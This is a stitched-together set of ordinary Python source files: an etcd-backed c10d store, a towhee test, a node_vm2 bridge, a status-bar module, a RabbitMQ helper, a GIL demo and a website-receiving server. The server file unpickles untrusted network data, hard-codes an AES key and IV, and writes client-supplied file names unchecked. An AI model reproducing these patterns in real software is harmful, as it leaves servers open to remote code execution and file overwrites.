b64_key = self._encode(key)
# c10d Store assumes value is an integer represented as a decimal string
try:
# Assume default value "0", if this key didn't yet:
node = self.client.write(
key=self.prefix + b64_key,
value=self._encode(str(num)), # i.e. 0 + num
prevExist=False,
)
return int(self._decode(node.value))
except etcd.EtcdAlreadyExist:
pass
while True:
# Note: c10d Store does not have a method to delete keys, so we
# can be sure it's still there.
node = self.client.get(key=self.prefix + b64_key)
new_value = self._encode(str(int(self._decode(node.value)) + num))
try:
node = self.client.test_and_set(
key=node.key, value=new_value, prev_value=node.value
)
return int(self._decode(node.value))
except etcd.EtcdCompareFailed:
cas_delay()
def wait(self, keys, override_timeout: Optional[datetime.timedelta] = None):
"""
Waits until all of the keys are published, or until timeout.
Raises:
LookupError - if timeout occurs
"""
b64_keys = [self.prefix + self._encode(key) for key in keys]
kvs = self._try_wait_get(b64_keys, override_timeout)
if kvs is None:
raise LookupError("Timeout while waiting for keys in EtcdStore")
# No return value on success
def check(self, keys) -> bool:
"""
Check if all of the keys are immediately present (without waiting).
"""
b64_keys = [self.prefix + self._encode(key) for key in keys]
kvs = self._try_wait_get(
b64_keys,
override_timeout=datetime.timedelta(microseconds=1), # as if no wait
)
return kvs is not None
def set_timeout(self, timeout: datetime.timedelta):
"""
Change the timeout used for all future operations.
"""
self.timeout = timeout
#
# Encode key/value data in base64, so we can store arbitrary binary data
# in EtcdStore. Input can be `str` or `bytes`.
# In case of `str`, utf-8 encoding is assumed.
#
def _encode(self, value) -> str:
if type(value) == bytes:
return b64encode(value).decode()
elif type(value) == str:
return b64encode(value.encode()).decode()
raise ValueError("Value must be of type str or bytes")
#
# Decode a base64 string (of type `str` or `bytes`).
# Return type is `bytes`, which is more convenient with the Store interface.
#
def _decode(self, value) -> bytes:
if type(value) == bytes:
return b64decode(value)
elif type(value) == str:
return b64decode(value.encode())
raise ValueError("Value must be of type str or bytes")
#
# Get all of the (base64-encoded) etcd keys at once, or wait until all the keys
# are published or timeout occurs.
# This is a helper method for the public interface methods.
#
# On success, a dictionary of {etcd key -> etcd value} is returned.
# On timeout, None is returned.
#
def _try_wait_get(self, b64_keys, override_timeout=None):
timeout = self.timeout if override_timeout is None else override_timeout
deadline = time.time() + timeout.total_seconds()
while True:
# Read whole directory (of keys), filter only the ones waited for
all_nodes = self.client.get(key=self.prefix)
req_nodes = {
node.key: node.value
for node in all_nodes.children
if node.key in b64_keys
}
if len(req_nodes) == len(b64_keys):
# All keys are available
return req_nodes
watch_timeout = deadline - time.time()
if watch_timeout <= 0:
return None
try:
self.client.watch(
key=self.prefix,
recursive=True,
timeout=watch_timeout,
index=all_nodes.etcd_index + 1,
)
except etcd.EtcdWatchTimedOut:
if time.time() >= deadline:
return None
else:
continue
except etcd.EtcdEventIndexCleared:
continue
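# --- Hedged usage sketch (illustration only; the etcd client and prefix below
# are hypothetical, not part of this module) ---
# EtcdStore is meant to be used like any other c10d Store:
#
#   store = EtcdStore(etcd_client=client, etcd_store_prefix="/torchelastic/run_1/kv")
#   store.set("rank_0_addr", "10.0.0.1:29500")
#   addr = store.get("rank_0_addr")       # blocks until published or timeout
#   n = store.add("barrier_counter", 1)   # atomic increment, returns the new value
#   store.wait(["rank_0_addr", "rank_1_addr"])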
def _get_socket_with_port():
import socket
addrs = socket.getaddrinfo(
host="localhost", port=None, family=socket.AF_UNSPEC, type=socket.SOCK_STREAM
)
for addr in addrs:
family, type, proto, _, _ = addr
try:
s = socket.socket(family, type, proto)
s.bind(("localhost", 0))
s.listen(0)
return s
except OSError as e:
s.close()
log.info("Socket creation attempt failed: " + e)
raise RuntimeError("Failed to create a socket")
# Helper for _etcd_rendezvous_handler(url)
def _parse_etcd_client_params(params):
kwargs = {}
if "protocol" in params:
protocol = params["protocol"]
assert protocol in ["http", "https"], "Protocol must be http or https."
kwargs["protocol"] = protocol
if "cacert" in params:
kwargs["ca_cert"] = params["cacert"]
if "cert" in params:
if "key" in params:
# python-etcd client expects key as a second element of `cert` tuple
kwargs["cert"] = (params["cert"], params["key"])
else:
kwargs["cert"] = params["cert"]
return kwargs
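# Hedged illustration of the mapping performed above: for the query parameters
#   protocol=https&cacert=/etc/ssl/ca.crt&cert=/etc/ssl/client.crt&key=/etc/ssl/client.key
# the returned kwargs would be:
#   {"protocol": "https", "ca_cert": "/etc/ssl/ca.crt",
#    "cert": ("/etc/ssl/client.crt", "/etc/ssl/client.key")}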
# Handler for torch.distributed "static" registration
def _etcd_rendezvous_handler(url):
"""
Example URLs:
etcd://localhost:2379/123?min_workers=4&max_workers=8&timeout=300
etcd://192.168.0.42/123?etcd_prefix=/custom_prefix/foo&min_workers=4
etcd://localhost:2379/123?min_workers=4&protocol=https&cacert=/etc/kubernetes/certs/ca.crt&cert=/etc/kubernetes/certs/client.crt&key=/etc/kubernetes/certs/client.key
Where:
123 - the run_id (unique id for this training job instance),
min_workers=4 - min number of workers expected to join the rendezvous,
max_workers=8 - max number of workers allowed to join the rendezvous,
                        defaults to min_workers if not specified.
timeout=300 - total timeout within which next_rendezvous is expected to
succeed; a RendezvousTimeoutException is raised otherwise;
                      Default is 600 (10 minutes).
last_call_timeout - additional wait amount ("last call") after
min number of workers has been reached.
Defaults to 30 seconds.
etcd_prefix - path prefix (from etcd root), inside which all
etcd nodes will be created.
Default is "/torchelastic/p2p".
protocol=https - http (default) or https to access etcd.
cacert=/etc/kubernetes/certs/ca.crt - CA cert to access etcd,
only makes sense with https.
cert=/etc/kubernetes/certs/client.crt - client cert to access etcd,
only makes sense with https.
key=/etc/kubernetes/certs/client.key - client key to access etcd,
only makes sense with https.
"""
import re
from urllib.parse import urlparse
url = urlparse(url)
assert url.scheme == "etcd"
# Etcd endpoints. (Current url format only allows a single host)
endpoint = url.netloc
match = re.match(r"(.+):(\d+)$", endpoint) # check if port was provided
if match:
etcd_endpoints = ((match.group(1), int(match.group(2))),)
else:
# Use default etcd port
etcd_endpoints = ((endpoint, 2379),)
# Run ID value -> unique identifier of this training job instance:
# typically a job_id or name assigned by the scheduler or user
run_id = url.path.strip("/")
# Parse all of query parameters:
params = dict(pair.split("=") for pair in filter(None, url.query.split("&")))
etcd_prefix = params.get("etcd_prefix", "/torchelastic/p2p")
num_min_workers = int(params["min_workers"])
num_max_workers = int(params.get("max_workers", num_min_workers))
assert num_min_workers >= 1, "Min number of workers should be at least 1"
assert (
num_max_workers >= num_min_workers
), "Max number of workers cannot be less than min number of workers"
timeout = int(params.get("timeout", CONST_DEFAULT_OVERALL_TIMEOUT))
last_call_timeout = int(
params.get("last_call_timeout", CONST_DEFAULT_LAST_CALL_TIMEOUT)
)
kwargs = _parse_etcd_client_params(params)
# Etcd rendezvous implementation
etcd_rdzv = EtcdRendezvous(
endpoints=etcd_endpoints,
prefix=etcd_prefix,
run_id=run_id,
num_min_workers=num_min_workers,
num_max_workers=num_max_workers,
timeout=timeout,
last_call_timeout=last_call_timeout,
**kwargs,
)
return EtcdRendezvousHandler(rdzv_impl=etcd_rdzv)
# torchelastic.rendezvous.RendezvousHandler using etcd (API v2):
register_rendezvous_handler("etcd", _etcd_rendezvous_handler)
|
test_window_runner.py
|
# Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from typing import Dict
import threading
from queue import Queue
from towhee.dataframe import DataFrame
from towhee.engine.operator_io.reader import BatchFrameReader
from towhee.engine.operator_runner.runner_base import RunnerStatus
from towhee.engine.operator_runner.window_runner import WindowRunner
from towhee.tests.mock_operators.sum_operator.sum_operator import SumOperator
DATA_QUEUE = Queue()
class MockWriter:
def __init__(self):
self.res = []
def write(self, data: Dict):
self.res.append(data)
def run(runner):
runner.process()
class TestRunner(unittest.TestCase):
"""
MapRunner test
"""
def test_window_runner(self):
writer = MockWriter()
df_in = DataFrame('op_test_in', {'num': {'type': 'int', 'index': 0}})
runner = WindowRunner('window_test', 0, 'sum_operator',
'mock_operators', {},
[BatchFrameReader(df_in, {'num': 0}, 5, 3)],
writer)
runner.set_op(SumOperator())
t = threading.Thread(target=run, args=(runner, ))
t.start()
self.assertEqual(runner.status, RunnerStatus.RUNNING)
for _ in range(100):
df_in.put_dict({'num': 1})
df_in.seal()
runner.join()
self.assertEqual(runner.status, RunnerStatus.FINISHED)
self.assertEqual(len(writer.res), 68)
count = 0
for item in writer.res:
if count < 64:
self.assertEqual(item.sum, 5)
elif count < 66:
self.assertEqual(item.sum, 4)
else:
self.assertEqual(item.sum, 1)
count += 1
def test_window_runner_with_error(self):
writer = MockWriter()
df_in = DataFrame('op_test_in', {'num': {'type': 'int', 'index': 0}})
runner = WindowRunner('window_test', 0, 'sum_operator',
'mock_operators', {},
[BatchFrameReader(df_in, {'num': 0}, 5, 3)],
writer)
runner.set_op(SumOperator())
t = threading.Thread(target=run, args=(runner, ))
t.start()
self.assertEqual(runner.status, RunnerStatus.RUNNING)
df_in.put(('error_data',))
df_in.seal()
runner.join()
self.assertEqual(runner.status, RunnerStatus.FAILED)
|
__init__.py
|
#! python3
import atexit
import json
from queue import Queue
import sys
from threading import Thread, Event, Lock
from subprocess import Popen, PIPE
from os import path, environ
from .__pkginfo__ import __version__
NODE_EXECUTABLE = "node"
VM_SERVER = path.join(path.dirname(__file__), "vm-server")
def eval(code, **options):
"""A shortcut to eval JavaScript.
:param str code: The code to be run.
:param options: Additional options sent to :meth:`VM.__init__`.
This function will create a :class:`VM`, run the code, and return the
result.
"""
with VM(**options) as vm:
# https://github.com/PyCQA/pylint/issues/3450
# pylint: disable=no-member
return vm.run(code)
DEFAULT_BRIDGE = None
def default_bridge():
global DEFAULT_BRIDGE
if DEFAULT_BRIDGE is not None:
return DEFAULT_BRIDGE
DEFAULT_BRIDGE = VMServer().start()
return DEFAULT_BRIDGE
@atexit.register
def close():
if DEFAULT_BRIDGE is not None:
DEFAULT_BRIDGE.close()
class BaseVM:
"""BaseVM class, containing some common methods for VMs.
"""
def __init__(self, server=None):
"""
:param VMServer server: Optional. If provided, the VM will be created
on the server. Otherwise, the VM will be created on a default
server, which is started on the first creation of VMs.
"""
if server is None:
server = default_bridge()
self.bridge = server
self.id = None
self.event_que = None
self.console = "off"
def __enter__(self):
"""This class can be used as a context manager, which automatically
:meth:`create` when entering the context.
"""
self.create()
return self
def __exit__(self, exc_type, exc_value, traceback):
"""See :meth:`destroy`"""
self.destroy()
def before_create(self, data):
"""Overwrite. Extend data before creating the VM."""
pass
def create(self):
"""Create the VM."""
data = {"action": "create"}
self.before_create(data)
self.id = self.communicate(data)
self.bridge.add_vm(self)
return self
def destroy(self):
"""Destroy the VM."""
self.communicate({"action": "destroy"})
self.bridge.remove_vm(self)
self.id = None
return self
def communicate(self, data):
"""Communicate with server. Wraps :meth:`VMServer.communicate` so we
can add additional properties to data.
        This method raises a :class:`VMError` if vm-server responds with an
        error.
"""
data["vmId"] = self.id
data = self.bridge.communicate(data)
if data["status"] != "success":
raise VMError(data["error"])
return data.get("value")
class VM(BaseVM):
"""VM class, represent `vm2.VM <https://github.com/patriksimek/vm2#vm>`_.
"""
def __init__(self, code=None, server=None, **options):
"""
:param str code: Optional JavaScript code to run after creating
the VM. Useful to define some functions.
:param VMServer server: Optional VMServer. See :class:`BaseVM`
for details.
:param options: The options for `vm2.VM`_.
"""
super().__init__(server)
self.id = None
self.code = code
self.options = options
def before_create(self, data):
"""Create VM."""
data.update(type="VM", code=self.code, options=self.options)
def run(self, code):
"""Execute JavaScript and return the result.
        If the server responds with an error, a :class:`VMError` will be raised.
"""
return self.communicate({"action": "run", "code": code})
def call(self, function_name, *args):
"""Call a function and return the result.
:param str function_name: The function to call.
:param args: Function arguments.
function_name can include "." to call functions on an object. However,
it is called like:
.. code-block:: javascript
var func = vm.run("function.to.call");
return func(...args);
        So the ``this`` keyword might not work as expected.
"""
return self.communicate({
"action": "call",
"functionName": function_name,
"args": args
})
class NodeVM(BaseVM):
"""NodeVM class, represent `vm2.NodeVM
<https://github.com/patriksimek/vm2#nodevm>`_.
"""
def __init__(self, server=None, **options):
"""
:param VMServer server: Optional VMServer. See :class:`BaseVM`
for details.
:param options: the options for `vm2.NodeVM`_.
If ``console="redirect"``, those console output will return as events,
stored in an event queue, which could be accessed with
:attr:`event_que`.
"""
super().__init__(server)
self.options = options
self.console = options.get("console", "inherit")
self.event_que = Queue()
"""A :class:`queue.Queue` object containing console events.
An event is a :class:`dict` and you can get the text value with:
.. code:: python
event = self.event_que.get()
text = event.get("value")
"""
def before_create(self, data):
"""Create NodeVM."""
data.update(type="NodeVM", options=self.options)
def run(self, code, filename=None):
"""Run the code and return a :class:`NodeVMModule`.
:param str code: The code to be run. The code should look like a
commonjs module (or an IIFE module, according to the options). See
`vm2.NodeVM`_ for details.
:param str filename: Optional, used for stack trace. Currently this
has no effect. (should vm-server send traceback back?)
:return: :class:`NodeVMModule`.
"""
id = self.communicate({
"action": "run",
"code": code,
"filename": filename
})
return NodeVMModule(id, self)
@classmethod
def code(cls, code, filename=None, **kwargs):
"""A class method helping you create a module in VM.
:param str code: The code sent to :meth:`run`.
:param str filename: The filename sent to :meth:`run`.
:param kwargs: Other arguments are sent to constructor.
.. code-block:: python
with NodeVM() as vm:
module = vm.run(code)
result = module.call_member("method")
vs.
.. code-block:: python
with NodeVM.code(code) as module:
result = module.call_member("method")
# access the vm with `module.vm`
"""
vm = cls(**kwargs)
module = vm.create().run(code, filename)
module.CLOSE_ON_EXIT = True
return module
class NodeVMModule:
"""Since we can only pass JSON between python and node, we use
this wrapper to access the module created by :meth:`NodeVM.run`.
This class shouldn't be initiated by users directly.
You can access the VM object with attribute :attr:`NodeVMModule.vm`.
"""
def __init__(self, id, vm):
self.id = id
self.vm = vm
self.CLOSE_ON_EXIT = False
def __enter__(self):
"""This class can be used as a context manager. See :meth:`NodeVM.code`.
"""
return self
    def __exit__(self, exc_type, exc_value, traceback):
"""Destroy the VM if:
1. This method is called.
2. The module is created by :meth:`NodeVM.code`.
"""
if self.CLOSE_ON_EXIT:
self.vm.destroy()
def communicate(self, data):
"""Wraps :meth:`vm.communicate`. So we can set additional properties
on the data before communication.
"""
data["moduleId"] = self.id
return self.vm.communicate(data)
def call(self, *args):
"""Call the module, in case that the module itself is a function."""
return self.communicate({
"action": "call",
"args": args
})
def get(self):
"""Return the module, in case that the module itself is json-encodable.
"""
return self.communicate({
"action": "get"
})
def call_member(self, member, *args):
"""Call a function member.
:param str member: Member's name.
:param args: Function arguments.
"""
return self.communicate({
"action": "callMember",
"member": member,
"args": args
})
def get_member(self, member):
"""Return member value.
:param str member: Member's name.
"""
return self.communicate({
"action": "getMember",
"member": member
})
def destroy(self):
"""Destroy the module.
You don't need this if you can just destroy the VM.
"""
out = self.communicate({
"action": "destroyModule"
})
if self.CLOSE_ON_EXIT:
self.vm.destroy()
return out
class VMServer:
"""VMServer class, represent vm-server. See :meth:`start` for details."""
def __init__(self, command=None):
"""
        :param str command: the command to spawn the node process. If not set,
            it falls back, in order, to:
1. Environment variable ``NODE_EXECUTABLE``
2. "node"
"""
self.closed = None
self.process = None
self.vms = {}
self.poll = {}
self.write_lock = Lock()
self.poll_lock = Lock()
self.inc = 1
if command is None:
command = environ.get("NODE_EXECUTABLE", NODE_EXECUTABLE)
self.command = command
def __enter__(self):
"""This class can be used as a context manager, which automatically
:meth:`start` the server.
.. code-block:: python
server = VMServer()
server.start()
# create VMs on the server...
server.close()
vs.
.. code-block:: python
with VMServer() as server:
# create VMs on the server...
"""
return self.start()
def __exit__(self, exc_type, exc_value, traceback):
"""See :meth:`close`."""
self.close()
def start(self):
"""Spawn a Node.js subprocess and run vm-server.
vm-server is a REPL server, which allows us to connect to it with
stdios. You can find the script at ``node_vm2/vm-server`` (`Github
<https://github.com/eight04/node_vm2/tree/master/node_vm2/vm-server>`__).
Communication using JSON::
> {"id": 1, "action": "create", "type": "VM"}
{"id": 1, "status": "success"}
> {"id": 2, "action": "run", "code": "var a = 0; a += 10; a"}
{"id": 2, "status": "success", "value": 10}
> {"id": 3, "action": "xxx"}
{"id": 3, "status": "error", "error": "Unknown action: xxx"}
A :class:`VMError` will be thrown if the node process cannot be spawned.
"""
if self.closed:
raise VMError("The VM is closed")
args = [self.command, VM_SERVER]
try:
self.process = Popen(args, bufsize=0, stdin=PIPE, stdout=PIPE) # pylint: disable=consider-using-with
except FileNotFoundError as err:
raise VMError(f"Failed starting VM server. '{self.command}' is unavailable.") from err
except Exception as err:
raise VMError("Failed starting VM server") from err
def reader():
for data in self.process.stdout:
try:
# FIXME: https://github.com/PyCQA/pylint/issues/922
data = json.loads(data.decode("utf-8")) or {}
except json.JSONDecodeError:
# the server is down?
self.close()
return
if data["type"] == "response":
with self.poll_lock:
self.poll[data["id"]][1] = data
self.poll[data["id"]][0].set()
elif data["type"] == "event":
try:
vm = self.vms[data["vmId"]]
except KeyError:
# the vm is destroyed
continue
if data["name"] == "console.log":
if vm.console == "redirect":
vm.event_que.put(data)
elif vm.console == "inherit":
sys.stdout.write(data.get("value", "") + "\n")
elif data["name"] == "console.error":
if vm.console == "redirect":
vm.event_que.put(data)
elif vm.console == "inherit":
sys.stderr.write(data.get("value", "") + "\n")
Thread(target=reader, daemon=True).start()
data = self.communicate({"action": "ping"})
if data["status"] == "error":
raise VMError("Failed to start: " + data["error"])
self.closed = False
return self
def close(self):
"""Close the server. Once the server is closed, it can't be
        re-opened."""
if self.closed:
return self
try:
data = self.communicate({"action": "close"})
if data["status"] == "error":
raise VMError("Failed to close: " + data["error"])
except OSError:
# the process is down?
pass
self.process.communicate()
self.process = None
self.closed = True
with self.poll_lock:
for event, _data in self.poll.values():
event.set()
return self
def add_vm(self, vm):
self.vms[vm.id] = vm
def remove_vm(self, vm):
del self.vms[vm.id]
def generate_id(self):
"""Generate unique id for each communication."""
inc = self.inc
self.inc += 1
return inc
def communicate(self, data):
"""Send data to Node and return the response.
:param dict data: must be json-encodable and follow vm-server's
            protocol. A unique id is automatically assigned to the data.
This method is thread-safe.
"""
id = self.generate_id()
data["id"] = id
text = json.dumps(data) + "\n"
event = Event()
with self.poll_lock:
self.poll[id] = [event, None]
# FIXME: do we really need lock for write?
with self.write_lock:
self.process.stdin.write(text.encode("utf-8"))
event.wait()
with self.poll_lock:
data = self.poll[id][1]
del self.poll[id]
return data
class VMError(Exception):
"""Errors thrown by VM."""
pass
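# --- Hedged usage sketch (illustration only; assumes Node.js is installed and
# reachable via NODE_EXECUTABLE) ---
#
#   from node_vm2 import eval, VM, NodeVM
#
#   print(eval("['foo', 'bar'].join()"))          # -> "foo,bar"
#
#   with VM() as vm:
#       vm.run("var sum = (a, b) => a + b")
#       print(vm.call("sum", 1, 2))               # -> 3
#
#   with NodeVM.code("exports.greet = name => 'hi ' + name") as module:
#       print(module.call_member("greet", "you")) # -> "hi you"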
|
anybar.py
|
import threading
import socket
from i3pystatus import IntervalModule
class AnyBar(IntervalModule):
"""
    This module shows a dot with a given color in your panel.
What color means is up to you. When to change color is also up to you.
It's a port of https://github.com/tonsky/AnyBar to i3pystatus.
Color can be changed by sending text to UDP port.
    Check the original repo for how to do it.
"""
colors = {
"black": "#444444", # 4C4C4C
"black_alt": "#FFFFFF",
"blue": "#4A90E2",
"cyan": "#27F2CB",
"exclamation": "#DE504C", # vary
"green": "#80EB0C",
"orange": "#FF9F00",
"purple": "#9013FE",
"question": "#4C4C4C", # vary
"question_alt": "#FFFFFF",
"red": "#CF0700",
"white": "#4C4C4C", # border
"white_alt": "#FFFFFF",
"yellow": "#FFEC00",
}
color = '#444444'
port = 1738
interval = 1
settings = (
("port", "UDP port to listen"),
("color", "initial color"),
)
def main_loop(self):
""" Mainloop blocks so we thread it."""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
port = int(getattr(self, 'port', 1738))
sock.bind(('127.0.0.1', port))
while True:
data, addr = sock.recvfrom(512)
color = data.decode().strip()
self.color = self.colors.get(color, color)
def init(self):
try:
t = threading.Thread(target=self.main_loop)
t.daemon = True
t.start()
except Exception as e:
self.output = {
"full_text": "Error creating new thread!",
"color": "#AE2525"
}
def run(self):
self.output = {
"full_text": "●",
"color": self.color
}
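# --- Hedged usage sketch (illustration only) ---
# The module listens on UDP port 1738 (by default) on localhost, so the dot
# color can be changed from any other script by sending the color as text:
#
#   import socket
#   sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#   sock.sendto(b"red", ("127.0.0.1", 1738))      # a name from the `colors` map
#   sock.sendto(b"#00FF00", ("127.0.0.1", 1738))  # or a raw hex color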
|
rabbit.py
|
# -*- coding: utf-8 -*-
"""
Created on 21 August 2017
@author: dgrossman
"""
import logging
import threading
import time
from functools import partial
import pika
class Rabbit(object):
'''
Base Class for RabbitMQ
'''
def __init__(self):
self.logger = logging.getLogger('rabbit')
def make_rabbit_connection(self, host, port, exchange, queue_name, keys,
total_sleep=float('inf')): # pragma: no cover
'''
Connects to rabbitmq using the given hostname,
exchange, and queue. Retries on failure until success.
Binds routing keys appropriate for module, and returns
the channel and connection.
'''
wait = True
do_rabbit = True
rabbit_channel = None
rabbit_connection = None
while wait and total_sleep > 0:
try:
# Starting rabbit connection
rabbit_connection = pika.BlockingConnection(
pika.ConnectionParameters(host=host, port=port)
)
rabbit_channel = rabbit_connection.channel()
rabbit_channel.exchange_declare(exchange=exchange,
exchange_type='topic')
rabbit_channel.queue_declare(queue=queue_name, exclusive=False)
self.logger.debug(
'connected to {0} rabbitmq...'.format(host))
wait = False
except Exception as e:
self.logger.debug(
'waiting for connection to {0} rabbitmq...'.format(host))
self.logger.debug(str(e))
time.sleep(2)
total_sleep -= 2
wait = True
if wait:
do_rabbit = False
if isinstance(keys, list) and not wait:
for key in keys:
self.logger.debug(
'array adding key:{0} to rabbitmq channel'.format(key))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=key)
if isinstance(keys, str) and not wait:
self.logger.debug(
'string adding key:{0} to rabbitmq channel'.format(keys))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=keys)
return rabbit_channel, rabbit_connection, do_rabbit
def start_channel(self, channel, mycallback, queue, m_queue):
        ''' handle threading for message type '''
self.logger.debug(
'about to start channel {0}'.format(channel))
channel.basic_consume(queue, partial(mycallback, q=m_queue))
mq_recv_thread = threading.Thread(target=channel.start_consuming)
mq_recv_thread.start()
return mq_recv_thread
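# --- Hedged usage sketch (illustration only; exchange, queue and routing key
# names are made-up examples) ---
#
#   from queue import Queue
#
#   rabbit = Rabbit()
#   channel, connection, ok = rabbit.make_rabbit_connection(
#       'localhost', 5672, 'my_exchange', 'my_queue', ['my.routing.#'],
#       total_sleep=30)
#   if ok:
#       m_queue = Queue()
#
#       def on_message(ch, method, properties, body, q=None):
#           q.put((method.routing_key, body))
#
#       recv_thread = rabbit.start_channel(channel, on_message, 'my_queue', m_queue)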
|
3.thread_GIL.py
|
import threading
from queue import Queue
import copy
import time
def job(l, q):
res = sum(l)
q.put(res)
def multithreading(l):
q = Queue()
threads = []
for i in range(4):
t = threading.Thread(target=job, args=(copy.copy(l), q), name='T%i' % i)
t.start()
threads.append(t)
[t.join() for t in threads]
total = 0
for _ in range(4):
total += q.get()
print(total)
def normal(l):
total = sum(l)
print(total)
if __name__ == '__main__':
l = list(range(1000000))
s_t = time.time()
normal(l*4)
print('normal: ',time.time()-s_t)
s_t = time.time()
multithreading(l)
print('multithreading: ', time.time()-s_t)
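# Note: on CPython the threaded version above is typically *not* faster than the
# plain one (and is often slower due to thread overhead), because the GIL lets
# only one thread execute Python bytecode at a time, so the CPU-bound sum() calls
# cannot run in parallel. Both variants add up the same 4,000,000 integers.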
|
website_receiver.py
|
import socket
import threading
import pickle
import os
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import unpad
import sys
AES_ENCRYPTION_KEY = b"N44vCTcb<W8sBXD@"
AES_BLOCKSIZE = 16
AES_IV = b"PoTFg9ZlV?g(bH8Z"
LISTEN_PORT = 1337
CHUNK_SIZE = 16384
GOOGLE_DNS_IP = "8.8.8.8"
DNS_PORT = 53
client_threads = []
websites_folder = ""
def recv_data_in_chunks(sock, total_size, chunk_size):
'''
    This function receives data of size total_size using the given socket, in chunks of chunk_size.
'''
full_data = b''
    # Receive the data pieces and join them together
while len(full_data) < total_size:
chunk_data = sock.recv(chunk_size)
print(f"Recieved {len(chunk_data)}")
full_data = full_data + chunk_data
# Return the decrypted data
return decrypt_data(full_data)
def json_to_folder(folder_json, relative_path=''):
'''
This function converts the given json-formatted data to a folder and saves it.
The format is:
{
"type" : "folder",
"name" : "the name of the folder",
"entries" : [
{
"type" : "file",
"name" : "the name of the file",
"data" : "either textual or binary data"
},
{
"type" : "folder",
"name" : "the name of the folder",
"entries" : [...]
},
...
]
}
'''
    # Prepare the relative_path for a recursive call or for saving an entry
relative_path += os.path.basename(folder_json['name']) + '/'
# Create directory for the folder
print('%s: Creating...' % (relative_path))
try:
os.mkdir(relative_path)
except:
        # The folder already exists; let the client know that it should be renamed
return 'RENAME'
# Wait until the system creates the folder
while not os.path.exists(relative_path):
pass
print('%s: Created!' % (relative_path))
# For each entry in the folder's entry-list
for entry in folder_json['entries']:
if entry['type'] == 'file':
# Write the data to the file
open(relative_path + entry['name'], "wb").write(entry['data'])
elif entry['type'] == 'folder':
# Convert the json to a folder recursively
json_to_folder(entry, relative_path)
return 'DONE'
def handle_client(client_socket, client_addr):
'''
This function handles a connection to a client that wants to host a website.
'''
print('%s: Connected!' % (str(client_addr)))
# Get the serialized data *length* from the client
data_length = int(client_socket.recv(CHUNK_SIZE).decode())
# Agree or deny to receive the data
if data_length > 0:
print('%s: OK (%d bytes)' % (str(client_addr), data_length))
client_socket.send(b'OK')
else:
print('%s: DENIED' % (str(client_addr)))
client_socket.send(b'DENIED')
return None
    print('%s: Receiving and deserializing data...' % (str(client_addr)))
    # Receive the folder data from the client and decrypt it
serialized_data = recv_data_in_chunks(client_socket, data_length, CHUNK_SIZE)
# Deserialize the folder data
website_folder_json = pickle.loads(serialized_data)
print('%s: Creating folder...' % (str(client_addr)))
    # Save the folder and make sure that it has a unique name
while json_to_folder(website_folder_json, websites_folder) == 'RENAME':
client_socket.send(b'RENAME')
new_name = client_socket.recv(CHUNK_SIZE).decode().split(':')[1]
website_folder_json['name'] = os.path.basename(new_name)
# End the client serving
client_socket.send(b'DONE')
print('Finished serving %s' % (str(client_addr)))
def decrypt_data(data):
'''
    This function uses the Cryptodome.Cipher library to decrypt the given data using the AES algorithm.
    Note: hard-coding the key and IV like this is insecure; it is kept this simple only for educational purposes.
    '''
    # Create an instance of an AES object that lets us decrypt our data
    # key - The encryption key. Random string hard-coded at the top of the code.
    # Note: The same key must be used by the encrypting endpoint, and its length must be 16, 24 or 32 bytes.
    # IV - The initial value of the encryption.
    # Note: For AES in CBC mode, the IV must be exactly one block (16 bytes) long.
    aes_decryptor = AES.new(AES_ENCRYPTION_KEY, AES.MODE_CBC, AES_IV)
    # Decrypt the given data, strip the padding, then return it
    return unpad(aes_decryptor.decrypt(data), AES_BLOCKSIZE)
def get_my_ip():
'''
    This function returns the local IP of the current machine.
'''
# Create a UDP socket and connect to google's DNS service
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket.connect((GOOGLE_DNS_IP, DNS_PORT))
# Retrieve the ip of the current machine from the connected socket
local_ip = udp_socket.getsockname()[0]
return local_ip
def main():
global websites_folder
# Get the websites folder from the arguments
    # Make sure that there's a possible folder given
if len(sys.argv) > 1:
# if the folder exists
if os.path.exists(sys.argv[1]) and os.path.isdir(sys.argv[1]):
websites_folder = sys.argv[1]
# Make sure that the path ends with a slash
if not websites_folder.endswith('\\') and not websites_folder.endswith('/'):
websites_folder += "\\"
else:
print("The given directory does not exist.\nUsing the current directory as the websites folder.")
else:
print("No directory was given.\nUsing the current directory as the websites folder.")
# Initialize the listening socket and start listening for clients
listening_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_ip_address = get_my_ip()
listening_socket.bind((local_ip_address, LISTEN_PORT))
listening_socket.listen()
print('Listening for clients on %s:%d...' % (local_ip_address, LISTEN_PORT))
while True:
# Accept a client, create a thread for him and start handling his connection
client_socket, client_address = listening_socket.accept()
client_thread = threading.Thread(target=handle_client, args=(client_socket, client_address))
client_threads.append(client_thread)
client_thread.start()
    # Make sure that all the clients' threads are closed
    for thread in client_threads:
        thread.join()
if __name__ == "__main__":
main()
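# --- Hedged sender-side sketch (illustration only; mirrors the protocol that
# handle_client() above expects) ---
#
#   from Cryptodome.Cipher import AES
#   from Cryptodome.Util.Padding import pad
#   import pickle, socket
#
#   payload = pad(pickle.dumps(folder_json), AES_BLOCKSIZE)
#   payload = AES.new(AES_ENCRYPTION_KEY, AES.MODE_CBC, AES_IV).encrypt(payload)
#   sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   sock.connect((receiver_ip, LISTEN_PORT))
#   sock.send(str(len(payload)).encode())
#   if sock.recv(CHUNK_SIZE) == b'OK':
#       sock.sendall(payload)
#       # then handle b'RENAME' (reply with "<anything>:<new_name>") until b'DONE'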
|
PyBirthdayWish.py
|
#!/usr/bin/python3
import os, random, sys
from threading import Thread
from time import sleep
import vlc
from termcolor import colored
from config import *
# Importing module specified in the config file
art = __import__(f'arts.{artFile}', globals(), locals(), ['*'])
def replaceMultiple(mainString, toBeReplace, newString):
"""[Replace a set of multiple sub strings with a new string]
Args:
mainString ([string]): [String in which the replacement will be done]
